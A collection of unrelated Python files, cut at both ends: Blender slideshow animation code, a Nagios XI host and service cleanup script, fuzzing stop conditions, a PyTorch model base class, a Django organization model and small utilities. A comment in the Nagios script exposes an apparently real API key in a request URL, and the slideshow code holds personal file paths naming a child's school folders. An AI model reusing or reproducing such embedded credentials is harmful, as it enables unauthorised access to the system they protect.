horizontal = mod == 0 or mod1 == 0
'''
print("picIdx = " + str(picIdx))
print("numPhotos = " + str(numPhotos))
print("sizeBorder = " + str(sizeBorder))
print("corner = " + str(corner))
print("vertical = " + str(vertical))
print("horizontal = " + str(horizontal))
print("div = " + str(picIdx / sizeBorder))
print("mod = " + str(picIdx % sizeBorder))
'''
resultIdx = None
if corner:
listCorners = [idxCorner1, idxCorner2, idxCorner3, idxCorner4]
listCorners.remove(picIdx)
resultIdx = random.choice(listCorners)
elif vertical:
resultIdx = picIdx + (numPhotos - sizeBorder) if picIdx < sizeBorder else picIdx - (numPhotos - sizeBorder)
elif horizontal:
resultIdx = picIdx + (sizeBorder - 1) if mod == 0 else picIdx - (sizeBorder - 1)
if resultIdx is not None:
result = 'pic' + str((resultIdx + 1))
return result
def getPicExtremoCorner (self, picName):
result = None
if picName is not None:
picIdx = int(picName[3:]) - 1
numPhotos = len(self.slideshow.photos)
sizeBorder = int(math.sqrt(numPhotos))
idxCorner1 = 0
idxCorner2 = (sizeBorder - 1)
idxCorner3 = (numPhotos - 1)
idxCorner4 = (numPhotos - sizeBorder)
valid = False
valid = valid or (picIdx == idxCorner1)
valid = valid or (picIdx == idxCorner2)
valid = valid or (picIdx == idxCorner3)
valid = valid or (picIdx == idxCorner4)
if valid:
resultIdx = None
resultIdx = idxCorner1 if picIdx == idxCorner3 else resultIdx
resultIdx = idxCorner3 if picIdx == idxCorner1 else resultIdx
resultIdx = idxCorner2 if picIdx == idxCorner4 else resultIdx
resultIdx = idxCorner4 if picIdx == idxCorner2 else resultIdx
if resultIdx is not None:
result = 'pic' + str((resultIdx + 1))
return result
def getPendiente2Pics (self, picName1, picName2):
result = None
if picName1 is not None and picName2 is not None:
import bpy
pic1 = bpy.data.objects[picName1]
pic2 = bpy.data.objects[picName2]
try:
result = (pic2.location.y - pic1.location.y) / (pic2.location.x - pic1.location.x)
except ZeroDivisionError:
pass  # vertical line: slope undefined, result stays None
return result
def distancePic2Line2Pics (self, picName, picNameStart, picNameEnd):
result = None
if picName is not None and picNameStart is not None and picNameEnd is not None:
import bpy
pic = bpy.data.objects[picName]
picStart = bpy.data.objects[picNameStart]
picEnd = bpy.data.objects[picNameEnd]
point = (pic.location.x, pic.location.y)
linePoint1 = (picStart.location.x, picStart.location.y)
linePoint2 = (picEnd.location.x, picEnd.location.y)
result = self.distancePoint2Line2P(point, linePoint1, linePoint2)
return result
def distance2Pics (self, picName1, picName2):
result = None
if picName1 is not None and picName2 is not None:
import bpy
pic1 = bpy.data.objects[picName1]
pic2 = bpy.data.objects[picName2]
result = math.sqrt(math.pow((pic2.location.x - pic1.location.x), 2) + math.pow((pic2.location.y - pic1.location.y), 2))
return result
def distancePoint2Line2P (self, point, linePoint1, linePoint2):
result = None
if point is not None and linePoint1 is not None and linePoint2 is not None:
# Line y = m*x + b; distance from point = |m*x - y + b| / sqrt(m^2 + 1)
if linePoint2[0] == linePoint1[0]:
# Vertical line: slope undefined, use the horizontal offset instead
result = math.fabs(point[0] - linePoint1[0])
else:
mPendiente = (linePoint2[1] - linePoint1[1]) / (linePoint2[0] - linePoint1[0])
b = linePoint1[1] - (mPendiente * linePoint1[0])
result = (math.fabs((mPendiente*point[0]) - point[1] + b)) / (math.sqrt(math.pow(mPendiente, 2) + 1))
return result
def getCornerPictures (self):
result = None
numPhotos = len(self.slideshow.photos)
sizeBorder = int(math.sqrt(numPhotos))
picCorner1 = 'pic1'
picCorner2 = 'pic' + str(sizeBorder)
picCorner3 = 'pic' + str(numPhotos)
picCorner4 = 'pic' + str(numPhotos - sizeBorder + 1)
result = [picCorner1, picCorner2, picCorner3, picCorner4]
return result
def getExternPictures (self):
result = None
numPhotos = len(self.slideshow.photos)
print("numPhotos = " + str(numPhotos))
sizeBorder = int(math.sqrt(numPhotos))
print("sizeBorder = " + str(sizeBorder))
result = list()
for i in range(0, numPhotos):
col = int(i / sizeBorder)
print("col = " + str(col))
valid = False
if col == 0:
valid = True
elif col == (sizeBorder - 1):
valid = True
elif (i % sizeBorder) == 0 or ((i + 1) % sizeBorder) == 0:
valid = True
if valid:
picName = 'pic' + str((i + 1))
result.append(picName)
return result
def doAnimSceneSequential (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ folderImages = " + str(folderImages))
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)
#print("NUM PHOTOS = " + str(numPhotos))
for i in range(0, numPhotos):
#startIdx = random.randint(1, numPhotos)
startIdx = i + 1
picName = 'pic' + str(startIdx)
self.showSequentialPhoto(picName, duration=120)
#print("EXTERN PICTURES = " + str(self.getExternPictures()))
frameEnd = self.frame
#frameEnd = numPhotos * 120
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def showSequentialPhoto (self, picName, duration=120):
import bpy
cam = bpy.data.objects['Camera'] # bpy.types.Camera
pic = bpy.data.objects[picName]
initZ = 2.5
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = pic.location.x + random.uniform(-0.001, 0.001)
cam.location.y = pic.location.y + random.uniform(-0.001, 0.001)
cam.location.z = pic.location.z + initZ + 0.01
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2) - 6)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2) - 6)
cam.location.x = pic.location.x + random.uniform(-0.001, 0.001)
cam.location.y = pic.location.y + random.uniform(-0.001, 0.001)
cam.location.z = pic.location.z + initZ - 0.01
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 6)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 6)
self.frame = self.frame + duration
def doAnimSceneDuration (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ folderImages = " + str(folderImages))
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)#16
frameEnd = 8 * 120
#renderOneFrame(50)
self.showDeleiteDuration(duration=120)
self.showDeleiteDuration(duration=120)
self.showZoomInOutDuration(duration=120)
self.showZoomInOutDuration(duration=120)
self.showRowColumnDuration(duration=120)
self.showRowColumnDuration(duration=120)
self.showSlideshowDuration(duration=120)
self.showSlideshowDuration(duration=120)
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def doAnimScene (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)#16
pps = 1.0
fps = self.fps
frameEnd = numPhotos * pps * fps
#renderOneFrame(50)
self.showDeleite(numPhotos, frameEnd)
self.showDeleite(numPhotos, frameEnd)
self.showZoomInOut(numPhotos, frameEnd)
self.showZoomInOut(numPhotos, frameEnd)
self.showRowColumn(numPhotos, frameEnd)
self.showRowColumn(numPhotos, frameEnd)
self.showSlideshow(numPhotos, frameEnd)
self.showSlideshow(numPhotos, frameEnd)
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def doAnimSceneTitle (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)#16
pps = 1.0
fps = self.fps
frameEnd = numPhotos * pps * fps
#renderOneFrame(50)
self.showDeleite(numPhotos, frameEnd)
self.showZoomInOut(numPhotos, frameEnd)
self.showDeleite(numPhotos, frameEnd)
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def animSceneDuration (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "animSceneDuration", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimSceneDuration(folderImages, movieOutput)
return result
def animSceneSequential (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "animSceneSequential", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimSceneSequential(folderImages, movieOutput)
return result
def animSceneDeleiteAllPhotos (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "animSceneDeleiteAllPhotos", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimSceneDeleiteAllPhotos(folderImages, movieOutput)
return result
def animSlideshow (self, folderImages, time=None, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty_background.blend', 'templates')
result = self.runMethodBlender(templatePath, "animSlideshow", [folderImages, time], movieOutput=movieOutput)
else:
result = self.doAnimSlideshow(folderImages, time, movieOutput)
return result
def animScene (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "animScene", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimScene(folderImages, movieOutput)
return result
def animSceneTitle (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "doAnimSceneTitle", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimSceneTitle(folderImages, movieOutput)
return result
def animSceneTitleItem (self, folderImages, durationFrames=120, mode='project', movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty_background.blend', 'templates')
result = self.runMethodBlender(templatePath, "doAnimSceneTitleItem", [folderImages, durationFrames, mode], movieOutput=movieOutput)
else:
result = self.doAnimSceneTitleItem(folderImages=folderImages, durationFrames=durationFrames, mode=mode, movieOutput=movieOutput)
return result
def doAnimSceneTitleItem (self, folderImages, durationFrames=120, mode='project', movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
bpy.context.scene.render.alpha_mode = 'TRANSPARENT'
#filepath imgBackground
#bpy.context.scene.node_tree.nodes['imgBackground'].filepath = '/home/jmramoss/Descargas/low-poly-abstract-background/background.jpg'
bpy.data.images['background'].filepath = '/home/jmramoss/Descargas/low-poly-abstract-background/background2.jpg'
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
#renderOneFrame(50)
if mode == 'project':
self.showDeleiteOnePhotoProject(durationFrames)
elif mode == 'section':
self.showDeleiteOnePhotoSection(durationFrames)
else:
self.showDeleiteOnePhoto(durationFrames)
result = self.saveMovie(frameStart=1, frameEnd=durationFrames, movieOutput=movieOutput)
return result
if __name__ == '__main__':
director = Director()
director.runMode = 'LOW'
director.verbose = True
director.forceFullRender = True
director.sortPhotos = True
#director.forceFrameEnd = 6
#out = director.animScene("/media/jmramoss/ALMACEN/unai_colegio_primaria/Tutoria_1A_2017_2018/01_21dic17_bailamos/.bak2")
#print(str(out))
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/4x4")
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/5x5")
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/3x2")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/4x4")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/5x5")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/5x5")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/4x4")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/5x5")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/4x4")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSlideshow("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSlideshow("/home/jmramoss/hd/res_slideshow/unai_colegio_primaria/Tutoria_1A_2017_2018/01_21dic17_bailamos/.bak2")
out = director.animSlideshow("/media/jmramoss/TOSHIBA EXT13/res_slideshow/unai_colegio_primaria/Tutoria_2A_2018_2019/02/jpg/.bak")
print(str(out))
#director.addBgSound("/media/jmramoss/ALMACEN/mp3/Bruno_Mars_-_24K_Magic_Official_Video[myplaylist-youtubemp3.com].mp3", "metal")
#director.saveMovie(True)
| nilq/baby-python | python |
from collections import defaultdict
import codecs
import csv
import json
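# Build a bipartite verb -> requirement-id graph from the CSV and emit it as vis.js DataSets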
by_verb = defaultdict(set)
with codecs.open('data.csv', encoding='utf-8', errors='ignore') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
verbs = [
v.strip()
for v_semi in row['verb'].lower().split(';')
for v in v_semi.split(',')
if v.strip() and v.strip() not in ('na', 'n/a')
]
for v in verbs:
by_verb[v].add(row['reqId'])
req_set = {reqId for reqs in by_verb.values() for reqId in reqs}
nodes = [{'id': v, 'label': v, 'color': 'red'} for v in by_verb]
nodes.extend({'id': req, 'label': req, 'color': 'lightblue'}
for req in req_set)
edges = [{'from': v, 'to': req}
for v, reqs in by_verb.items() for req in reqs]
print("var data = {")
print("nodes: new vis.DataSet({0}),".format(json.dumps(nodes)))
print("edges: new vis.DataSet({0})".format(json.dumps(edges)))
print("};")
| nilq/baby-python | python |
# import numpy as np
#
# ranNUm1 = np.random.random([2,3])
# print(ranNUm1)
# print(type(ranNUm1))  # <class 'numpy.ndarray'>; all elements of an ndarray must share one dtype
#
# arrTest = np.arange(32)
# print(arrTest)
# print(arrTest.reshape([4 , 8]))
| nilq/baby-python | python |
class Solution:
def solve(self, digits):
letter_map = {  # digit-to-letters table (renamed to avoid shadowing the built-in map)
'2':'abc',
'3': 'def',
'4': 'ghi',
'5': 'jkl',
'6': 'mno',
'7': 'pqrs',
'8': 'tuv',
'9': 'wxyz'
}
output = []
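# Depth-first backtracking: extend the partial combination one digit at a time;
# when no digits remain, the combination is complete.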
def helper(combination, digit):
if not len(digit):
output.append(combination)
return
d = digit[0]
for letter in letter_map[d]:
helper(combination + letter, digit[1:])
helper("", digits)
return output
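# Hypothetical usage sketch:
# Solution().solve("23")  # -> ['ad', 'ae', 'af', 'bd', 'be', 'bf', 'cd', 'ce', 'cf']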
| nilq/baby-python | python |
import random
import pickle
import torch
from torch import nn
class EncDecNetwork(nn.Module):
def __init__(self, encoder, decoder):
super(EncDecNetwork, self).__init__()
self.encoder = encoder
self.decoder = decoder
self._cuda = False
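# _cuda manually tracks GPU placement (set by cuda() below)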
def full_forward(self):
raise NotImplementedError
def translate(self):
raise NotImplementedError
def cuda(self):
super(EncDecNetwork, self).cuda()
self.encoder.cuda()
self.decoder.cuda()
self._cuda = True
def initialize_params(self, init_range):
for p in self.parameters():
p.data.uniform_(-init_range, init_range)
def save_config_data(self, path):
checkpoint_data = self.get_checkpoint_data()
with open(path, 'wb') as f:
pickle.dump(checkpoint_data, f, -1)
def get_checkpoint_data(self):
raise NotImplementedError('get_checkpoint_data should be implemented by class that inherits EncDecNetwork')
| nilq/baby-python | python |
from opentrons import protocol_api
from opentrons.types import Point  # Point is used below for the well-bottom offset
import json
import os
import math
import threading
from time import sleep
metadata = {'apiLevel': '2.5'}
NUM_SAMPLES = 24
SAMPLE_VOLUME = 475
def run(protocol: protocol_api.ProtocolContext):
source = protocol.load_labware('starlab_96_wellplate_2000ul', 2)
dest = protocol.load_labware('starlab_96_wellplate_2000ul', 3)
tiprack_1 = protocol.load_labware('opentrons_96_filtertiprack_200ul', 6)
m300 = protocol.load_instrument('p300_multi_gen2', 'left', tip_racks=[tiprack_1])
s = source.wells_by_name()['A1']
side = 1
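# Pick up 0.8 mm above the well bottom, offset 2.5 mm along x (opentrons coordinates are in mm)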
loc = s.bottom(0.8).move(Point(x=side*2.5))  # changed from 0.5 to 0.8 and from 3 to 2.5
d = dest.wells_by_name()['A12']
m300.transfer(SAMPLE_VOLUME, loc, d)
| nilq/baby-python | python |
#!/usr/bin/python
# -*- coding: utf-8 -*-###
# Copyright (2018) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
'''
This script deletes all hosts and services except the localhost and services related localhost.
'''
import json
import sys
import requests
from time import sleep
def apply_config_and_restart_nagios(nagiosDetails):
retCode = 0
# Actual command :-
# response = requests.post('http://10.188.239.22/nagiosxi/api/v1/system/applyconfig?apikey=WhNXoMABXiR7WMNO3RMN6a34oGPp6TY2qLg8NPY0868k9U9r3be8kgrLVhahq8Da')
URI = "http://" + nagiosDetails["nagiosHost"] + "/nagiosxi/api/v1/system/applyconfig?apikey=" + nagiosDetails["apikey"]
# Apply config URI (used to restart Nagios XI)
print("Restarting nagios after deleting config")
response = requests.post(URI)
retVal = int(response.status_code)
retStat = json.loads(response.text)
#print(retStat)
try:
status = retStat["success"]
print("Restart Nagios with retVal :- " + str(retVal) + " and retStat :- " + str(retStat))
retCode = 0
except:
status = retStat["error"]
print("Restart Nagios with retVal :- " + str(retVal) + " and retStat :- " + str(retStat) + ". Plugin exiting.")
retCode = 1 # Something is wrong.
sleep(1)
sys.exit(1) # Exit for now.
return retCode
def delete_all_services_except_localhost_services(nagiosDetails):
# Get a list of all services to delete them one by one - Do not delete services of localhost
params = (
('apikey', nagiosDetails["apikey"]),
('pretty', '1'),
)
URI = 'http://' + nagiosDetails["nagiosHost"] + '/nagiosxi/api/v1/objects/servicestatus'
print("Get service list URI = ", URI)
response = requests.get(URI, params=params)
response = json.loads(response.content)
print("Num services - " + str(response["recordcount"]) )
serviceList = response["servicestatus"]
for service in serviceList:
# Do not delete services of localhost
if service["host_name"] == 'localhost':
continue
params = (
('apikey', nagiosDetails["apikey"]),
('pretty', '1'),
('host_name', service["host_name"]),
('service_description', service["name"]),
)
URI = 'http://' + nagiosDetails["nagiosHost"] + '/nagiosxi/api/v1/config/service'
print("Delete service URI = ", URI, "Deleting service - ", service["name"])
#sleep(5)
response = requests.delete(URI, params=params)
sleep(0.1)
return 0
def delete_all_hosts_except_localhost(nagiosDetails):
# Get a list of all hosts to delete them one by one - Do not delete localhost
params = (
('apikey', nagiosDetails["apikey"]),
('pretty', '1'),
)
URI = 'http://' + nagiosDetails["nagiosHost"] + '/nagiosxi/api/v1/objects/hoststatus'
print("Get host list URI = ", URI)
response = requests.get(URI, params=params)
response = json.loads(response.content)
print("Num hosts - " + str(response["recordcount"]) )
hostList = response["hoststatus"]
# JSON format differs if it is a single entry.
if int(response["recordcount"]) == 1:
print("Not deleting localhost")
return 0
else:
for host in hostList:
# Do not delete localhost
print("Hostname = ", host["name"])
if host["name"] == 'localhost':
continue
params = (
('apikey', nagiosDetails["apikey"]),
('pretty', '1'),
('host_name', host["name"])
)
URI = 'http://' + nagiosDetails["nagiosHost"] + '/nagiosxi/api/v1/config/host'
print("Delete host URI = ", URI, "Deleting host - ", host["name"])
#sleep(5)
response = requests.delete(URI, params=params)  # delete once; the duplicate call was removed
sleep(0.1)
return 0
if __name__ == '__main__':
import argparse
from datetime import datetime, timedelta
parser = argparse.ArgumentParser(add_help=True, description='Usage')
parser.add_argument('-i','--input_file',dest='input_file', required=True,
help='Json file containing oneview and nagios details used for testing main module')
# Check and parse the input arguments into python's format
input = parser.parse_args()
with open(input.input_file) as data_file:
inputConfig = json.load(data_file)
nagiosDetails = inputConfig["nagios_config"]
delete_all_services_except_localhost_services(nagiosDetails)
apply_config_and_restart_nagios(nagiosDetails)
sleep(5)
delete_all_hosts_except_localhost(nagiosDetails)
apply_config_and_restart_nagios(nagiosDetails)
| nilq/baby-python | python |
# Copyright 2022 Garda Technologies, LLC. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Originally written by Valery Korolyov <fuzzah@tuta.io>
from typing import Callable, Dict, Optional, Tuple, Any
from time import time
import os
import logging
log = logging.getLogger(__name__)
from bugbane.modules.stats.fuzz.fuzz_stats import FuzzStats
class StopConditionError(Exception):
"""Exception class for errors that happen in stop condition related routines"""
class StopConditions:
"""
Class that holds time-based stop conditions
"""
registry: Dict[str, Callable[[FuzzStats, int], bool]] = {}
@classmethod
def register(cls, name: str) -> Callable[[Callable[[FuzzStats, int], bool]], Callable[[FuzzStats, int], bool]]:
"""Register stop condition in internal registry"""
def wrapper(
wrapped: Callable[[FuzzStats, int], bool]
) -> Callable[[FuzzStats, int], bool]:
if name in cls.registry:
log.warning("replacing '%s' in %s registry", name, cls.__name__)
cls.registry[name] = wrapped
return wrapped
return wrapper
@classmethod
def get(cls, wanted_condition: str) -> Callable[[FuzzStats, int], bool]:
"""Return stop condition function"""
if wanted_condition not in cls.registry:
raise TypeError(
f"stop condition {wanted_condition} is not registered in {cls.__name__}"
)
return cls.registry[wanted_condition]
@classmethod
def met(cls, wanted_condition: str, stats: FuzzStats, seconds: int) -> bool:
"""Check if stop condition met"""
return cls.get(wanted_condition)(stats, seconds)
@StopConditions.register("time_without_finds")
def time_without_finds(stats: FuzzStats, seconds: int) -> bool:
"""The last new path was found N seconds ago (across all instances)"""
now = int(time())
stamp = stats.last_path_timestamp
log.trace(
"now=%s, stamp=%s, now-stamp=%s seconds=%s", now, stamp, now - stamp, seconds
)
return stamp > 0 and (now - stamp) >= seconds
@StopConditions.register("real_run_time")
def real_run_time(stats: FuzzStats, seconds: int) -> bool:
"""Actual test time is N or more seconds"""
now = int(time())
return (now - stats.start_timestamp) >= seconds
@StopConditions.register("total_run_time")
def total_run_time(stats: FuzzStats, seconds: int) -> bool:
"""
Total run time (sum from all instances) is N or more seconds.
FuzzStats holds the most old fuzzer start timestamp, so it is assumed that
all fuzzers start at the same time.
"""
now = int(time())
return stats.num_instances * (now - stats.start_timestamp) >= seconds
def detect_required_stop_condition(
environ: Optional[Dict[str, str]] = None, bane_vars: Optional[Dict[str, Any]] = None
) -> Tuple[str, int]:
"""
Gets condition for stopping fuzzing job.
Returns tuple: (stop condition function name, time in seconds).
Note: bane_vars is not used as of now.
Return first detected:
env var CERT_FUZZ_DURATION set? -> time_without_finds with specified time
env var CERT_FUZZ_LEVEL set? -> time_without_finds with predefined time
env var FUZZ_DURATION set? -> real_run_time with specified time
-> real_run_time with 10 minutes
"""
env = environ or os.environ
bane_vars = bane_vars or {}
log.trace("env size is %d, vars size is %d", len(env), len(bane_vars))
cert_fuzz_duration = env.get("CERT_FUZZ_DURATION")
cert_fuzz_level = env.get("CERT_FUZZ_LEVEL")
ci_fuzz_duration = env.get("FUZZ_DURATION")
try:
if cert_fuzz_duration is not None:
return ("time_without_finds", int(cert_fuzz_duration))
cert_fuzz_levels_time_without_finds = {
4: 2 * 60 * 60,  # control level 4 -> 2 hours without new finds
3: 4 * 60 * 60,
2: 8 * 60 * 60,
}
if cert_fuzz_level is not None:
duration = cert_fuzz_levels_time_without_finds[int(cert_fuzz_level)]
return ("time_without_finds", duration)
if ci_fuzz_duration is not None:
return ("real_run_time", int(ci_fuzz_duration))
except ValueError as e:
raise StopConditionError(f"Bad environment variable value ({e})") from e
except KeyError as e:
supported_levels = ", ".join(
str(x) for x in cert_fuzz_levels_time_without_finds
)
raise StopConditionError(
f"Supported CERT_FUZZ_LEVEL values: {supported_levels}.\n"
"For other options please use CERT_FUZZ_DURATION=<seconds>"
) from e
log.warning("Wasn't able to detect stop condition. Using default of 10 minutes")
return ("real_run_time", 10 * 60)
| nilq/baby-python | python |
"""
Projects module.
By default, only projects that are listed in the configuration are
loaded automatically. See configuration variables:
*_PLUGINS_AUTOLOAD
*_PLUGINS_PROJECTS
"""
import logging
import importlib
from benchbuild.settings import CFG
LOG = logging.getLogger(__name__)
def discover():
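# Import every project plugin listed in the config; import failures are logged, not raised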
if CFG["plugins"]["autoload"]:
project_plugins = CFG["plugins"]["projects"].value
for project_plugin in project_plugins:
try:
importlib.import_module(project_plugin)
except ImportError as import_error:
LOG.error("Could not find '%s'", project_plugin)
LOG.error("ImportError: %s", import_error.msg)
| nilq/baby-python | python |
# Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0 + Commons Clause
#---------------------------------------------------------------------------
# organization.py - a model of an organization like GitHub organizations
# holding lots of repos for import
#---------------------------------------------------------------------------
import json
from django.contrib.auth.models import Group, User
from django.db import models
from vespene.manager import Shared
from vespene.common.logger import Logger
from vespene.models import BaseModel, as_dict
from vespene.models.build import QUEUED, RUNNING, UNKNOWN
from vespene.manager.permissions import PermissionsManager
permissions = PermissionsManager()
LOG = Logger()
class Organization(models.Model, BaseModel):
class Meta:
db_table = 'organizations'
indexes = [
models.Index(fields=['name'], name='organization_name_idx'),
]
name = models.CharField(unique=True, max_length=512)
description = models.TextField(blank=True)
organization_type = models.CharField(max_length=100)
organization_identifier = models.CharField(max_length=512, help_text="example: 'vespene-io' for github.com/vespene-io/")
api_endpoint = models.CharField(max_length=512, blank=True, default="", help_text="blank, or https://{hostname}/api/v3 for GitHub Enterprise")
import_enabled = models.BooleanField(default=True)
import_without_dotfile = models.BooleanField(default=False)
overwrite_project_name = models.BooleanField(default=True)
overwrite_project_script = models.BooleanField(default=True)
overwrite_configurations = models.BooleanField(default=True)
allow_pipeline_definition = models.BooleanField(default=True)
allow_worker_pool_assignment = models.BooleanField(default=True)
auto_attach_ssh_keys = models.ManyToManyField('SshKey', related_name='+', blank=True, help_text="SSH keys to be assigned to imported projects")
default_worker_pool = models.ForeignKey('WorkerPool', related_name='+', null=False, on_delete=models.PROTECT)
force_rescan = models.BooleanField(default=False, help_text="rescan once at the next opportunity, ignoring refresh_minutes")
refresh_minutes = models.IntegerField(default=120)
scm_login = models.ForeignKey('ServiceLogin', related_name='organizations', on_delete=models.SET_NULL, null=True, help_text="... or add an SSH key in the next tab", blank=True)
worker_pool = models.ForeignKey('WorkerPool', related_name='organizations', null=False, on_delete=models.PROTECT)
created_by = models.ForeignKey(User, related_name='+', null=True, blank=True, on_delete=models.SET_NULL)
last_build = models.ForeignKey('Build', null=True, blank=True, related_name='last_build_for_organization', on_delete=models.SET_NULL)
active_build = models.ForeignKey('Build', null=True, blank=True, related_name='active_build_for_organization', on_delete=models.SET_NULL)
last_successful_build = models.ForeignKey('Build', null=True, blank=True, related_name='last_successful_build_for_organization', on_delete=models.SET_NULL)
def __str__(self):
return self.name
| nilq/baby-python | python |
#coding: utf-8
import sys
from common import reverse_items
if len(sys.argv) != 3:
